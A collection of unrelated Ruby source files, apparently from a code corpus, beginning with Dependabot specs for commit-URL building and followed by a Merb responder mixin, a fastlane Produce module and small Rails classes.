eq("https://github.com/netflix/pollyjs/"\ "commits/@pollyjs/[email protected]/packages/ember") end context "without a previous version" do let(:dependency_previous_version) { "0.0.3" } it do is_expected.to eq("https://github.com/netflix/pollyjs/"\ "commits/@pollyjs/[email protected]/packages/ember") end end context "without a non-correct previous version" do let(:dependency_previous_version) { "master" } it do is_expected.to eq("https://github.com/netflix/pollyjs/"\ "commits/@pollyjs/[email protected]/packages/ember") end end end end context "with a github repo and tags with no prefix" do before do allow(builder). to receive(:fetch_dependency_tags). and_return(%w(1.5.0 1.4.0 1.3.0)) end it do is_expected.to eq("https://github.com/gocardless/business/"\ "commits/1.4.0") end end context "with a github repo and no tags found" do let(:upload_pack_fixture) { "no_tags" } it do is_expected.to eq("https://github.com/gocardless/business/commits") end end context "with a dependency that has a git source" do let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: { type: "git", url: "https://github.com/gocardless/business" } }] end let(:dependency_requirements) { dependency_previous_requirements } let(:dependency_version) { "cd8274d15fa3ae2ab983129fb037999f264ba9a7" } let(:dependency_previous_version) do "7638417db6d59f3c431d3e1f261cc637155684cd" end it "uses the SHA-1 hashes to build the compare URL" do expect(builder.commits_url). to eq( "https://github.com/gocardless/business/compare/"\ "7638417db6d59f3c431d3e1f261cc637155684cd..."\ "cd8274d15fa3ae2ab983129fb037999f264ba9a7" ) end context "with refs and numeric versions" do let(:dependency_version) { "1.4.0" } let(:dependency_previous_version) { "1.3.0" } let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: { type: "git", url: "https://github.com/gocardless/business", ref: "v1.3.0" } }] end let(:dependency_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: { type: "git", url: "https://github.com/gocardless/business", ref: "v1.4.0" } }] end it "uses the refs to build the compare URL" do expect(builder.commits_url). to eq( "https://github.com/gocardless/business/compare/v1.3.0...v1.4.0" ) end end context "without a previous version" do let(:dependency_previous_version) { nil } it "uses the new SHA1 hash to build the compare URL" do expect(builder.commits_url). to eq("https://github.com/gocardless/business/commits/"\ "cd8274d15fa3ae2ab983129fb037999f264ba9a7") end end context "for the previous requirement only" do let(:dependency_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: nil }] end let(:dependency_version) { "1.4.0" } let(:upload_pack_fixture) { "business" } it do is_expected. to eq("https://github.com/gocardless/business/compare/"\ "7638417db6d59f3c431d3e1f261cc637155684cd...v1.4.0") end context "without credentials" do let(:credentials) do [{ "type" => "git_source", "host" => "bitbucket.org", "username" => "greysteil", "password" => "secret_token" }] end context "when authentication fails" do before do stub_request(:get, service_pack_url).to_return(status: 404) end it do is_expected. to eq("https://github.com/gocardless/business/commits") end end context "when authentication succeeds" do let(:upload_pack_fixture) { "business" } it do is_expected. to eq("https://github.com/gocardless/business/compare/"\ "7638417db6d59f3c431d3e1f261cc637155684cd...v1.4.0") end end end context "without a previous version" do let(:dependency_previous_version) { nil } it "uses the reference specified" do expect(builder.commits_url). to eq("https://github.com/gocardless/business/commits/v1.4.0") end context "but with a previously specified reference" do let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: { type: "git", url: "https://github.com/gocardless/business", ref: "7638417" } }] end it "uses the reference specified" do # It would be nice to pick up the previously specified reference, # but we'd have to do a `pinned?` check to do so reliably expect(builder.commits_url). to eq("https://github.com/gocardless/business/commits/v1.4.0") end end end end end context "with a gitlab repo" do let(:service_pack_url) do "https://gitlab.com/org/business.git/info/refs"\ "?service=git-upload-pack" end let(:source) do Dependabot::Source.new( provider: "gitlab", repo: "org/#{dependency_name}" ) end context "with old and new tags" do let(:dependency_previous_version) { "1.3.0" } it "gets the right URL" do is_expected.to eq("https://gitlab.com/org/business/"\ "compare/v1.3.0...v1.4.0") end end context "with only a new tag" do let(:dependency_previous_version) { "0.3.0" } it "gets the right URL" do is_expected.to eq("https://gitlab.com/org/business/commits/v1.4.0") end end context "no tags" do let(:dependency_previous_version) { "0.3.0" } let(:dependency_version) { "0.5.0" } it "gets the right URL" do is_expected.to eq("https://gitlab.com/org/business/commits/master") end end end context "with a bitbucket repo" do let(:service_pack_url) do "https://bitbucket.org/org/business.git/info/refs"\ "?service=git-upload-pack" end let(:source) do Dependabot::Source.new( provider: "bitbucket", repo: "org/#{dependency_name}" ) end context "with credentials" do let(:credentials) do [{ "type" => "git_source", "host" => "github.com", "username" => "x-access-token", "password" => "token" }, { "type" => "git_source", "host" => "bitbucket.org", "username" => "greysteil", "password" => "secret_token" }] end it "uses the credentials" do builder.commits_url expect(WebMock). to have_requested(:get, service_pack_url). with(basic_auth: %w(greysteil secret_token)) end end context "with old and new tags" do let(:dependency_previous_version) { "1.3.0" } it "gets the right URL" do is_expected.to eq("https://bitbucket.org/org/business/"\ "branches/compare/v1.4.0..v1.3.0") end end context "with only a new tag" do let(:dependency_previous_version) { "0.3.0" } it "gets the right URL" do is_expected. to eq("https://bitbucket.org/org/business/commits/tag/v1.4.0") end end context "no tags" do let(:dependency_previous_version) { "0.3.0" } let(:dependency_version) { "0.5.0" } it "gets the right URL" do is_expected.to eq("https://bitbucket.org/org/business/commits") end end context "no previous version" do let(:dependency_previous_version) { nil } let(:dependency_version) { "0.5.0" } it "gets the right URL" do is_expected.to eq("https://bitbucket.org/org/business/commits") end end end context "without a recognised source" do let(:source) { nil } it { is_expected.to be_nil } end end describe "#commits" do subject { builder.commits } context "with old and new tags" do let(:dependency_previous_version) { "1.3.0" } context "with a github repo" do before do stub_request( :get, "https://api.github.com/repos/gocardless/business/compare/"\ "v1.3.0...v1.4.0" ).with(headers: { "Authorization" => "token token" }). to_return( status: 200, body: fixture("github", "business_compare_commits.json"), headers: { "Content-Type" => "application/json" } ) end it "returns an array of commits" do is_expected.to match_array( [ { message: "Remove SEPA calendar (replaced by TARGET)", sha: "d2eb29beda934c14220146c82f830de2edd63a25", html_url: "https://github.com/gocardless/business/commit/"\ "d2eb29beda934c14220146c82f830de2edd63a25" }, { message: "Merge pull request #8 from gocardless/"\ "rename-sepa-to-ecb\n\nRemove SEPA calendar "\ "(replaced by TARGET)", sha: "a5970daf0b824e4c3974e57474b6cf9e39a11d0f", html_url: "https://github.com/gocardless/business/commit/"\ "a5970daf0b824e4c3974e57474b6cf9e39a11d0f" }, { message: "Spacing: https://github.com/my/repo/pull/5", sha: "0bfb8c3f0d2701abf9248185beeb8adf643374f6", html_url: "https://github.com/gocardless/business/commit/"\ "0bfb8c3f0d2701abf9248185beeb8adf643374f6" }, { message: "Allow custom calendars", sha: "1c72c35ff2aa9d7ce0403d7fd4aa010d94723076", html_url: "https://github.com/gocardless/business/commit/"\ "1c72c35ff2aa9d7ce0403d7fd4aa010d94723076" }, { message: "[Fix #9] Allow custom calendars", sha: "7abe4c2dc0161904c40c221a48999d12995fbea7", html_url: "https://github.com/gocardless/business/commit/"\ "7abe4c2dc0161904c40c221a48999d12995fbea7" }, { message: "Bump version to v1.4.0", sha: "26f4887ec647493f044836363537e329d9d213aa", html_url: "https://github.com/gocardless/business/commit/"\ "26f4887ec647493f044836363537e329d9d213aa" } ] ) end context "that 404s" do before do response = { message: "No common ancestor between v4.7.0 and 5.0.8." }.to_json stub_request( :get, "https://api.github.com/repos/gocardless/business/compare/"\ "v1.3.0...v1.4.0" ).with(headers: { "Authorization" => "token token" }). to_return( status: 404, body: response, headers: { "Content-Type" => "application/json" } ) end it { is_expected.to eq([]) } end context "for a monorepo" do let(:dependency_name) { "@pollyjs/ember" } let(:dependency_version) { "0.2.0" } let(:dependency_previous_version) { "0.1.0" } let(:source) do Dependabot::Source.new( provider: "github", repo: "netflix/pollyjs", directory: "packages/@pollyjs/ember" ) end before do allow(builder). to receive(:fetch_dependency_tags). and_return( %w( @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] ) ) end before do allow(builder). to receive(:reliable_source_directory?). and_return(true) end before do stub_request( :get, "https://api.github.com/repos/netflix/pollyjs/commits?"\ "path=packages/@pollyjs/ember&sha=@pollyjs/[email protected]" ).with(headers: { "Authorization" => "token token" }). to_return( status: 200, body: fixture("github", "commits-pollyjs-ember-0.2.0.json"), headers: { "Content-Type" => "application/json" } ) stub_request( :get, "https://api.github.com/repos/netflix/pollyjs/commits?"\ "path=packages/@pollyjs/ember&sha=@pollyjs/[email protected]" ).with(headers: { "Authorization" => "token token" }). to_return( status: 200, body: fixture("github", "commits-pollyjs-ember-0.1.0.json"), headers: { "Content-Type" => "application/json" } ) end it "returns an array of commits relevant to the given path" do is_expected.to match_array( [ { message: "feat: Custom persister support\n\n"\ "* feat: Custom persister support\r\n\r\n"\ "* Create a @pollyjs/persister package\r\n"\ "* Move out shared utils into their own "\ "@pollyjs/utils package\r\n"\ "* Add support to register a custom persister "\ "(same way as an adapter)\r\n"\ "* Add more tests\r\n\r\n"\ "* docs: Custom adapter & persister docs\r\n\r\n"\ "* test: Add custom persister test", sha: "8bb313cc08716b80076c6f68d056396ce4b4d282", html_url: "https://github.com/Netflix/pollyjs/commit/"\ "8bb313cc08716b80076c6f68d056396ce4b4d282" }, { message: "chore: Publish\n\n"\ " - @pollyjs/[email protected]\n"\ " - @pollyjs/[email protected]\n"\ " - @pollyjs/[email protected]\n"\ " - @pollyjs/[email protected]\n"\ " - @pollyjs/[email protected]", sha: "ebf6474d0008e9e76249a78473263894dd0668dc", html_url: "https://github.com/Netflix/pollyjs/commit/"\ "ebf6474d0008e9e76249a78473263894dd0668dc" } ] ) end end end context "with a bitbucket repo" do let(:bitbucket_compare_url) do "https://api.bitbucket.org/2.0/repositories/org/business/commits/"\ "?exclude=v1.3.0&include=v1.4.0" end let(:bitbucket_compare) do fixture("bitbucket", "business_compare_commits.json") end let(:source) do Dependabot::Source.new( provider: "bitbucket", repo: "org/#{dependency_name}" ) end let(:service_pack_url) do "https://bitbucket.org/org/business.git/info/refs"\ "?service=git-upload-pack" end before do stub_request(:get, bitbucket_compare_url). to_return(status: 200, body: bitbucket_compare, headers: { "Content-Type" => "application/json" }) end it "returns an array of commits" do is_expected.to match_array( [ { message: "Added signature for changeset f275e318641f", sha: "deae742eacfa985bd20f47a12a8fee6ce2e0447c", html_url: "https://bitbucket.org/ged/ruby-pg/commits/"\ "deae742eacfa985bd20f47a12a8fee6ce2e0447c" }, { message: "Eliminate use of deprecated PGError constant from "\ "specs", sha: "f275e318641f185b8a15a2220e7c189b1769f84c", html_url: "https://bitbucket.org/ged/ruby-pg/commits/"\ "f275e318641f185b8a15a2220e7c189b1769f84c" } ] ) end end context "with a gitlab repo" do let(:gitlab_compare_url) do "https://gitlab.com/api/v4/projects/org%2Fbusiness/repository/"\ "compare?from=v1.3.0&to=v1.4.0" end let(:service_pack_url) do "https://gitlab.com/org/business.git/info/refs"\ "?service=git-upload-pack" end let(:gitlab_compare) do fixture("gitlab", "business_compare_commits.json") end let(:source) do Dependabot::Source.new( provider: "gitlab", repo: "org/#{dependency_name}" ) end before do stub_request(:get, gitlab_compare_url). to_return(status: 200, body: gitlab_compare, headers: { "Content-Type" => "application/json" }) end it "returns an array of commits" do is_expected.to match_array( [ { message: "Add find command\n", sha: "8d7d08fb9a7a439b3e6a1e6a1a34cbdb4273de87", html_url: "https://gitlab.com/org/business/commit/"\ "8d7d08fb9a7a439b3e6a1e6a1a34cbdb4273de87" }, { message: "...\n", sha: "4ac81646582f254b3e86653b8fcd5eda6d8bb45d", html_url: "https://gitlab.com/org/business/commit/"\ "4ac81646582f254b3e86653b8fcd5eda6d8bb45d" }, { message: "MP version\n", sha: "4e5081f867631f10d8a29dc6853a052f52241fab", html_url: "https://gitlab.com/org/business/commit/"\ "4e5081f867631f10d8a29dc6853a052f52241fab" }, { message: "BUG: added 'force_consistent' keyword argument "\ "with default True\n\nThe bug fix is necessayry to "\ "pass the test turbomole_h3o2m.py.\n", sha: "e718899ddcdc666311d08497401199e126428163", html_url: "https://gitlab.com/org/business/commit/"\ "e718899ddcdc666311d08497401199e126428163" } ] ) end context "with a dependency that has a git source" do let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: { type: "git", url: "https://gitlab.com/orgs/#{dependency_name}" } }] end let(:dependency_requirements) { dependency_previous_requirements } let(:dependency_version) do "cd8274d15fa3ae2ab983129fb037999f264ba9a7" end let(:dependency_previous_version) do "7638417db6d59f3c431d3e1f261cc637155684cd" end context "that 404s" do before do response = { message: "404 Project Not Found" }.to_json gitlab_compare_url = "https://gitlab.com/api/v4/projects/"\ "org%2Fbusiness/repository/compare"\ "?from=7638417db6d59f3c431d3e1f261cc637155684cd"\ "&to=cd8274d15fa3ae2ab983129fb037999f264ba9a7" stub_request(:get, gitlab_compare_url). to_return(status: 404, body: response, headers: { "Content-Type" => "application/json" }) end it { is_expected.to eq([]) } end end end end context "with only a new tag" do let(:dependency_previous_version) { "0.1.0" } let(:upload_pack_fixture) { "business" } it { is_expected.to eq([]) } end context "with no tags found" do let(:upload_pack_fixture) { "no_tags" } it { is_expected.to eq([]) } end context "without a recognised source" do let(:source) { nil } it { is_expected.to eq([]) } end end end
32.530201
79
0.512207
ac73836df316c7519b61030f87dbcee92674197a
382
module Starling module Resources # A resource representing a Contact returned from the Contacts API class ContactResource < BaseResource # @return [String] the Starling internal ID of the contact def id parsed_data['id'] end # @return [String] the name of the contact def name parsed_data['name'] end end end end
22.470588
70
0.646597
79ee9d158aaaed9c8f22a603c53cea6aedc4ad06
1,425
require "administrate/base_dashboard" class PilotRegionDashboard < BaseDashboard # ATTRIBUTE_TYPES # a hash that describes the type of each of the model's fields. # # Each different type represents an Administrate::Field object, # which determines how the attribute is displayed # on pages throughout the dashboard. ATTRIBUTE_TYPES = { administrative_division: Field::BelongsTo, id: Field::Number, created_at: DateField, updated_at: DateField, }.freeze # COLLECTION_ATTRIBUTES # an array of attributes that will be displayed on the model's index page. # # By default, it's limited to four items to reduce clutter on index pages. # Feel free to add, remove, or rearrange items. COLLECTION_ATTRIBUTES = [ :administrative_division, :id, :created_at, ].freeze # SHOW_PAGE_ATTRIBUTES # an array of attributes that will be displayed on the model's show page. SHOW_PAGE_ATTRIBUTES = [ :id, :administrative_division, :created_at, :updated_at, ].freeze # FORM_ATTRIBUTES # an array of attributes that will be displayed # on the model's form (`new` and `edit`) pages. FORM_ATTRIBUTES = [ :administrative_division, ].freeze # Overwrite this method to customize how pilot regions are displayed # across all pages of the admin dashboard. # # def display_resource(pilot_region) # "PilotRegion ##{pilot_region.id}" # end end
27.941176
76
0.719298
08b2adc7a7593307a6071a353a76d9ff82acf731
923
class ReviewsController < ApplicationController before_action :set_recipe def new @review = Review.new end def create if user_signed_in? @review = Review.new(review_params) @review.recipe = Recipe.find_by(id: params[:recipe_id]) @review.user = current_user if @review.save @recipe = @review.recipe respond_to do |format| format.html { redirect_to @recipe } format.js { } #controller method sends back response as js end else redirect_back(fallback_location: root_path) end else redirect_to new_user_session_path, alert: "You must be logged in to leave a review" end end private def set_recipe if @recipe.present? @recipe = Recipe.find(params[:recipe_id]) end end def review_params params.require(:review).permit(:difficulty, :description, :reviewer, :recipe_id) end end
23.666667
89
0.661972
395d882e25adc3e8ed41401fb62326c1fd8b7f4a
15,629
require 'enumerator' require 'merb-core/controller/mime' module Merb # The ResponderMixin adds methods that help you manage what # formats your controllers have available, determine what format(s) # the client requested and is capable of handling, and perform # content negotiation to pick the proper content format to # deliver. # # If you hear someone say "Use provides" they're talking about the # Responder. If you hear someone ask "What happened to respond_to?" # it was replaced by provides and the other Responder methods. # # == A simple example # # The best way to understand how all of these pieces fit together is # with an example. Here's a simple web-service ready resource that # provides a list of all the widgets we know about. The widget list is # available in 3 formats: :html (the default), plus :xml and :text. # # class Widgets < Application # provides :html # This is the default, but you can # # be explicit if you like. # provides :xml, :text # # def index # @widgets = Widget.fetch # render @widgets # end # end # # Let's look at some example requests for this list of widgets. We'll # assume they're all GET requests, but that's only to make the examples # easier; this works for the full set of RESTful methods. # # 1. The simplest case, /widgets.html # Since the request includes a specific format (.html) we know # what format to return. Since :html is in our list of provided # formats, that's what we'll return. +render+ will look # for an index.html.erb (or another template format # like index.html.mab; see the documentation on Template engines) # # 2. Almost as simple, /widgets.xml # This is very similar. They want :xml, we have :xml, so # that's what they get. If +render+ doesn't find an # index.xml.builder or similar template, it will call +to_xml+ # on @widgets. This may or may not do something useful, but you can # see how it works. # # 3. A browser request for /widgets # This time the URL doesn't say what format is being requested, so # we'll look to the HTTP Accept: header. If it's '*/*' (anything), # we'll use the first format on our list, :html by default. # # If it parses to a list of accepted formats, we'll look through # them, in order, until we find one we have available. If we find # one, we'll use that. Otherwise, we can't fulfill the request: # they asked for a format we don't have. So we raise # 406: Not Acceptable. # # == A more complex example # # Sometimes you don't have the same code to handle each available # format. Sometimes you need to load different data to serve # /widgets.xml versus /widgets.txt. In that case, you can use # +content_type+ to determine what format will be delivered. # # class Widgets < Application # def action1 # if content_type == :text # Widget.load_text_formatted(params[:id]) # else # render # end # end # # def action2 # case content_type # when :html # handle_html() # when :xml # handle_xml() # when :text # handle_text() # else # render # end # end # end # # You can do any standard Ruby flow control using +content_type+. If # you don't call it yourself, it will be called (triggering content # negotiation) by +render+. # # Once +content_type+ has been called, the output format is frozen, # and none of the provides methods can be used. module ResponderMixin TYPES = {} class ContentTypeAlreadySet < StandardError; end # ==== Parameters # base<Module>:: The module that ResponderMixin was mixed into def self.included(base) # :nodoc: base.extend(ClassMethods) base.class_eval do class_inheritable_accessor :class_provided_formats self.class_provided_formats = [] end base.reset_provides end module ClassMethods # Adds symbols representing formats to the controller's default list of # provided_formats. These will apply to every action in the controller, # unless modified in the action. If the last argument is a Hash or an # Array, these are regarded as arguments to pass to the to_<mime_type> # method as needed. # # ==== Parameters # *formats<Symbol>:: # A list of mime-types that the controller should provide. # # ==== Returns # Array[Symbol]:: List of formats passed in. # # ==== Examples # provides :html, :xml #--- # @public def provides(*formats) formats.each do |fmt| self.class_provided_formats << fmt unless class_provided_formats.include?(fmt) end end # This class should only provide the formats listed here, despite any # other definitions previously or in superclasses. # # ==== Parameters # *formats<Symbol>:: Registered mime-types. # # ==== Returns # Array[Symbol]:: List of formats passed in. # #--- # @public def only_provides(*formats) clear_provides provides(*formats) end # This class should not provide any of this list of formats, despite any. # other definitions previously or in superclasses. # # ==== Parameters # *formats<Symbol>:: Registered mime-types. # # ==== Returns # Array[Symbol]:: # List of formats that remain after removing the ones not to provide. # #--- # @public def does_not_provide(*formats) self.class_provided_formats -= formats end # Clear the list of provides. # # ==== Returns # Array:: An empty Array. def clear_provides self.class_provided_formats.clear end # Reset the list of provides to include only :html. # # ==== Returns # Array[Symbol]:: [:html]. def reset_provides only_provides(:html) end end # ==== Returns # Array[Symbol]:: # The current list of formats provided for this instance of the # controller. It starts with what has been set in the controller (or # :html by default) but can be modifed on a per-action basis. def _provided_formats @_provided_formats ||= class_provided_formats.dup end # Sets the provided formats for this action. Usually, you would use a # combination of provides, only_provides and does_not_provide to manage # this, but you can set it directly. # # ==== Parameters # *formats<Symbol>:: A list of formats to be passed to provides. # # ==== Raises # Merb::ResponderMixin::ContentTypeAlreadySet:: # Content negotiation already occured, and the content_type is set. # # ==== Returns # Array[Symbol]:: List of formats passed in. def _set_provided_formats(*formats) if @_content_type raise ContentTypeAlreadySet, "Cannot modify provided_formats because content_type has already been set" end @_provided_formats = [] provides(*formats) end alias :_provided_formats= :_set_provided_formats # Adds formats to the list of provided formats for this particular request. # Usually used to add formats to a single action. See also the # controller-level provides that affects all actions in a controller. # # ==== Parameters # *formats<Symbol>:: # A list of formats to add to the per-action list of provided formats. # # ==== Raises # Merb::ResponderMixin::ContentTypeAlreadySet:: # Content negotiation already occured, and the content_type is set. # # ==== Returns # Array[Symbol]:: List of formats passed in. # #--- # @public def provides(*formats) if @_content_type raise ContentTypeAlreadySet, "Cannot modify provided_formats because content_type has already been set" end formats.each do |fmt| _provided_formats << fmt unless _provided_formats.include?(fmt) end end # Sets list of provided formats for this particular request. Usually used # to limit formats to a single action. See also the controller-level # only_provides that affects all actions in a controller. # # ==== Parameters # *formats<Symbol>:: # A list of formats to use as the per-action list of provided formats. # # ==== Returns # Array[Symbol]:: List of formats passed in. # #--- # @public def only_provides(*formats) _set_provided_formats(*formats) end # Removes formats from the list of provided formats for this particular # request. Usually used to remove formats from a single action. See # also the controller-level does_not_provide that affects all actions in a # controller. # # ==== Parameters # *formats<Symbol>:: Registered mime-type # # ==== Returns # Array[Symbol]:: # List of formats that remain after removing the ones not to provide. # #--- # @public def does_not_provide(*formats) formats.flatten! self._provided_formats -= formats end # Do the content negotiation: # 1. if params[:format] is there, and provided, use it # 2. Parse the Accept header # 3. If it's */*, use the first provided format # 4. Look for one that is provided, in order of request # 5. Raise 406 if none found def _perform_content_negotiation # :nodoc: raise Merb::ControllerExceptions::NotAcceptable if _provided_formats.empty? if (fmt = params[:format]) && !fmt.empty? accepts = [fmt.to_sym] else accepts = Responder.parse(request.accept).map {|t| t.to_sym}.compact end specifics = accepts & _provided_formats return specifics.first unless specifics.length == 0 return _provided_formats.first if accepts.include? :all raise Merb::ControllerExceptions::NotAcceptable end # Returns the output format for this request, based on the # provided formats, <tt>params[:format]</tt> and the client's HTTP # Accept header. # # The first time this is called, it triggers content negotiation # and caches the value. Once you call +content_type+ you can # not set or change the list of provided formats. # # Called automatically by +render+, so you should only call it if # you need the value, not to trigger content negotiation. # # ==== Parameters # fmt<String>:: # An optional format to use instead of performing content negotiation. # This can be used to pass in the values of opts[:format] from the # render function to short-circuit content-negotiation when it's not # necessary. This optional parameter should not be considered part # of the public API. # # ==== Returns # Symbol:: The content-type that will be used for this controller. # #--- # @public def content_type(fmt = nil) self.content_type = (fmt || _perform_content_negotiation) unless @_content_type @_content_type end # Sets the content type of the current response to a value based on # a passed in key. The Content-Type header will be set to the first # registered header for the mime-type. # # ==== Parameters # type<Symbol>:: The content type. # # ==== Raises # ArgumentError:: type is not in the list of registered mime-types. # # ==== Returns # Symbol:: The content-type that was passed in. # #--- # @semipublic def content_type=(type) unless Merb.available_mime_types.has_key?(type) raise Merb::ControllerExceptions::NotAcceptable.new("Unknown content_type for response: #{type}") end headers['Content-Type'] = Merb.available_mime_types[type][:request_headers].first @_content_type = type end end class Responder protected # Parses the raw accept header into an array of sorted AcceptType objects. # # ==== Parameters # accept_header<~to_s>:: The raw accept header. # # ==== Returns # Array[AcceptType]:: The accepted types. def self.parse(accept_header) list = accept_header.to_s.split(/,/).enum_for(:each_with_index).map do |entry,index| AcceptType.new(entry,index += 1) end.sort.uniq # firefox (and possibly other browsers) send broken default accept headers. # fix them up by sorting alternate xml forms (namely application/xhtml+xml) # ahead of pure xml types (application/xml,text/xml). if app_xml = list.detect{|e| e.super_range == 'application/xml'} list.select{|e| e.to_s =~ /\+xml/}.each { |acc_type| list[list.index(acc_type)],list[list.index(app_xml)] = list[list.index(app_xml)],list[list.index(acc_type)] } end list end end class AcceptType attr_reader :media_range, :quality, :index, :type, :sub_type # ==== Parameters # entry<String>:: The accept type pattern # index<Fixnum>:: # The index used for sorting accept types. A lower value indicates higher # priority. def initialize(entry,index) @index = index @media_range, quality = entry.split(/;\s*q=/).map{|a| a.strip } @type, @sub_type = @media_range.split(/\//) quality ||= 0.0 if @media_range == '*/*' @quality = ((quality || 1.0).to_f * 100).to_i end # Compares two accept types for sorting purposes. # # ==== Parameters # entry<AcceptType>:: The accept type to compare. # # ==== Returns # Fixnum:: # -1, 0 or 1, depending on whether entry has a lower, equal or higher # priority than the accept type being compared. def <=>(entry) c = entry.quality <=> quality c = index <=> entry.index if c == 0 c end # ==== Parameters # entry<AcceptType>:: The accept type to compare. # # ==== Returns # Boolean:: # True if the accept types are equal, i.e. if the synonyms for this # accept type includes the entry media range. def eql?(entry) synonyms.include?(entry.media_range) end # An alias for eql?. def ==(entry); eql?(entry); end # ==== Returns # Fixnum:: A hash based on the super range. def hash; super_range.hash; end # ==== Returns # Array[String]:: # All Accept header values, such as "text/html", that match this type. def synonyms @syns ||= Merb.available_mime_types.values.map do |e| e[:request_headers] if e[:request_headers].include?(@media_range) end.compact.flatten end # ==== Returns # String:: # The primary media range for this accept type, i.e. either the first # synonym or, if none exist, the media range. def super_range synonyms.first || @media_range end # ==== Returns # Symbol: The type as a symbol, e.g. :html. def to_sym Merb.available_mime_types.select{|k,v| v[:request_headers] == synonyms || v[:request_headers][0] == synonyms[0]}.flatten.first end # ==== Returns # String:: The accept type as a string, i.e. the media range. def to_s @media_range end end end
33.610753
111
0.627935
ed07c88e081a995a559473116e93e3bd0db078c9
4,958
require 'spaceship' require_relative 'module' module Produce class DeveloperCenter SERVICE_ON = "on" SERVICE_OFF = "off" SERVICE_COMPLETE = "complete" SERVICE_UNLESS_OPEN = "unlessopen" SERVICE_UNTIL_FIRST_LAUNCH = "untilfirstauth" SERVICE_LEGACY = "legacy" SERVICE_CLOUDKIT = "cloudkit" ALLOWED_SERVICES = { app_group: [SERVICE_ON, SERVICE_OFF], apple_pay: [SERVICE_ON, SERVICE_OFF], associated_domains: [SERVICE_ON, SERVICE_OFF], data_protection: [ SERVICE_COMPLETE, SERVICE_UNLESS_OPEN, SERVICE_UNTIL_FIRST_LAUNCH ], game_center: [SERVICE_ON, SERVICE_OFF], health_kit: [SERVICE_ON, SERVICE_OFF], home_kit: [SERVICE_ON, SERVICE_OFF], wireless_accessory: [SERVICE_ON, SERVICE_OFF], icloud: [SERVICE_LEGACY, SERVICE_CLOUDKIT], in_app_purchase: [SERVICE_ON, SERVICE_OFF], inter_app_audio: [SERVICE_ON, SERVICE_OFF], passbook: [SERVICE_ON, SERVICE_OFF], push_notification: [SERVICE_ON, SERVICE_OFF], siri_kit: [SERVICE_ON, SERVICE_OFF], vpn_configuration: [SERVICE_ON, SERVICE_OFF], network_extension: [SERVICE_ON, SERVICE_OFF], hotspot: [SERVICE_ON, SERVICE_OFF], multipath: [SERVICE_ON, SERVICE_OFF], nfc_tag_reading: [SERVICE_ON, SERVICE_OFF] } def run login create_new_app end def create_new_app ENV["CREATED_NEW_APP_ID"] = Time.now.to_i.to_s if app_exists? UI.success("[DevCenter] App '#{Produce.config[:app_identifier]}' already exists, nothing to do on the Dev Center") ENV["CREATED_NEW_APP_ID"] = nil # Nothing to do here else app_name = Produce.config[:app_name] UI.message("Creating new app '#{app_name}' on the Apple Dev Center") app = Spaceship.app.create!(bundle_id: app_identifier, name: app_name, enable_services: enable_services, mac: Produce.config[:platform] == "osx") if app.name != Produce.config[:app_name] UI.important("Your app name includes non-ASCII characters, which are not supported by the Apple Developer Portal.") UI.important("To fix this a unique (internal) name '#{app.name}' has been created for you. Your app's real name '#{Produce.config[:app_name]}'") UI.important("will still show up correctly on iTunes Connect and the App Store.") end UI.message("Created app #{app.app_id}") UI.crash!("Something went wrong when creating the new app - it's not listed in the apps list") unless app_exists? ENV["CREATED_NEW_APP_ID"] = Time.now.to_i.to_s UI.success("Finished creating new app '#{app_name}' on the Dev Center") end return true end def enable_services app_service = Spaceship.app_service enabled_clean_options = {} # "enable_services" was deprecated in favor of "enable_services" config_enabled_services = Produce.config[:enable_services] || Produce.config[:enable_services] config_enabled_services.each do |k, v| if k.to_sym == :data_protection case v when SERVICE_COMPLETE enabled_clean_options[app_service.data_protection.complete.service_id] = app_service.data_protection.complete when SERVICE_UNLESS_OPEN enabled_clean_options[app_service.data_protection.unlessopen.service_id] = app_service.data_protection.unlessopen when SERVICE_UNTIL_FIRST_LAUNCH enabled_clean_options[app_service.data_protection.untilfirstauth.service_id] = app_service.data_protection.untilfirstauth end elsif k.to_sym == :icloud case v when SERVICE_LEGACY enabled_clean_options[app_service.icloud.on.service_id] = app_service.icloud.on enabled_clean_options[app_service.cloud_kit.xcode5_compatible.service_id] = app_service.cloud_kit.xcode5_compatible when SERVICE_CLOUDKIT enabled_clean_options[app_service.icloud.on.service_id] = app_service.icloud.on enabled_clean_options[app_service.cloud_kit.cloud_kit.service_id] = app_service.cloud_kit.cloud_kit end else if v == SERVICE_ON enabled_clean_options[app_service.send(k.to_s).on.service_id] = app_service.send(k.to_s).on else enabled_clean_options[app_service.send(k.to_s).off.service_id] = app_service.send(k.to_s).off end end end enabled_clean_options end def app_identifier Produce.config[:app_identifier].to_s end private def app_exists? Spaceship.app.find(app_identifier, mac: Produce.config[:platform] == "osx") != nil end def login Spaceship.login(Produce.config[:username], nil) Spaceship.select_team end end end
37.847328
154
0.669221
3823026771b76e9fe24fb3f1c5accefa17ac97f4
1,281
require 'spec_helper' shared_examples_for 'an searchable essence' do let(:essence_type) { essence_class.model_name.name.demodulize } let(:content) { create(:alchemy_content) } before do allow(content).to receive(:essence_class).and_return(essence_class) end context 'with searchable set to true' do before do allow(content).to receive(:definition).and_return({ 'type' => essence_type, 'searchable' => true }) end it "sets the searchable attribute to true" do content.create_essence! expect(content.essence.searchable).to be(true) end end context 'with searchable set to false' do before do allow(content).to receive(:definition).and_return({ 'type' => essence_type, 'searchable' => false }) end it "sets the searchable attribute to false" do content.create_essence! expect(content.essence.searchable).to be(false) end end context 'with searchable key missing' do before do allow(content).to receive(:definition).and_return({ 'type' => essence_type }) end it "sets the searchable attribute to true" do content.create_essence! expect(content.essence.searchable).to be(true) end end end
24.634615
71
0.661983
6241124af1cd7c7d5fb2753a6a1b5e9523b96300
2,594
